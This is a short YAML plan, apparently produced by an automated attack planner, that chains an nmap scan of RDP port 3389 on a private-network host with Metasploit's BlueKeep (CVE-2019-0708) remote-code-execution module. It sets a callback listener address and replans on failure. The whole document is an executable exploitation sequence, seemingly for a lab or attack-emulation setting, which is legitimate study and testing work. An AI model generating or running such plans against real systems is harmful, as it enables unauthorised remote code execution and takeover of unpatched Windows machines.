metadata:
  generated_at: '2026-04-13T13:46:44.299509+00:00'
  planner: rl
  total_steps: 2
steps:
- name: Reconnaissance on 192.168.56.30
  type: shell
  command: nmap -sV -p 3389 192.168.56.30
  delay_before: 3.17
  delay_after: 1.3
  log_output: true
- name: Exploit CVE-2019-0708 on 192.168.56.30
  type: metasploit
  module: exploit/windows/rdp/cve_2019_0708_bluekeep_rce
  options:
    RHOSTS: 192.168.56.30
    LHOST: 192.168.56.10
  delay_before: 5.94
  delay_after: 1.86
  log_output: true
  on_failure: replan
